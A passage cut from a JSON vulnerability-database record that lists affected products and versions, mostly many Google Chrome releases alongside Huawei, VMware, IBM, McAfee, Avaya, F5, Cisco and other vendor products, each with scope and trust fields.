"vendor": "google", "version": "6.0.472.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.50" }, { "model": "gaia r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.45" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "email and web security appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.6" }, { "model": "espace ivs v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.830.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.75" }, { "model": "oceanstor s5500t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.399.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.131" }, { "model": "advanced threat defense", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.2" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.2" }, { "model": "oceanstor s2600t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.925.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.64" }, { "model": "oceanstor n8300 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.864.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.9" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.63" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7765061.090.224.30300" }, { "model": "it business management suite", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "oceanstor s5600t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "t620 plus flexible quad core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.208" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.959.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.106" }, { "model": "oceanstor v100r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.27" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.624.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.40" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.26" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.18" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1293.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.38" }, { "model": "oceanstor s5500 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.698.0" }, { "model": "secureplatform r75.46", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.13" }, { "model": "ipso r71.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1079.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.338" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.598.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.89" }, { "model": "high-density server xh321 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.894.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.30" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "data recovery", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1061" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.737.0" }, { "model": "oceanstor s5800t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.214" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.21" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.23" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1672.2" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.52" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9." }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.54" }, { "model": "oceanstor v100r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v1500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.7" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.124" }, { "model": "nsx for vsphere", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.81" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3090" }, { "model": "services vm", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.311" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.693.0" }, { "model": "oceanstor vtl6900 v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.736.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.4" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9303" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.1.1538" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1069.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.606.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.438.0" }, { "model": "encryption switch 2498-e32", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.3" }, { "model": "oceanstor css v100r001c05", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.120" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.11" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7235" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.209" }, { "model": "idp series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.113" }, { "model": "phaser r14-12 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7800081.150.104.35600" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.226" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.869.0" }, { "model": "dc v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.738.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.231" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "gaia r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.2" }, { "model": "secureplatform r71.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oceanstor s5800t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.13" }, { "model": "secureplatform ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.578.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.54" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.63" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.29" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.0" }, { "model": "agile controller v100r001c00spc205", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.380.0" }, { "model": "cloud single sign on", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.809.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "mds", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "gaia embedded r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.361.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1018" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.701.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.780.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.116" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.605.0" }, { "model": "t620 plus flexible dual core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1051.0" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.51" }, { "model": "ipso r71.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "secure access link policy server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.49" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.55" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.663.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.537.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "phaser r14-12 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "6700081.140.105.00700" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1275.0" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.133" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.96" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1046.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.122" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "t610 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1062" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.934.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1020" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.469.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 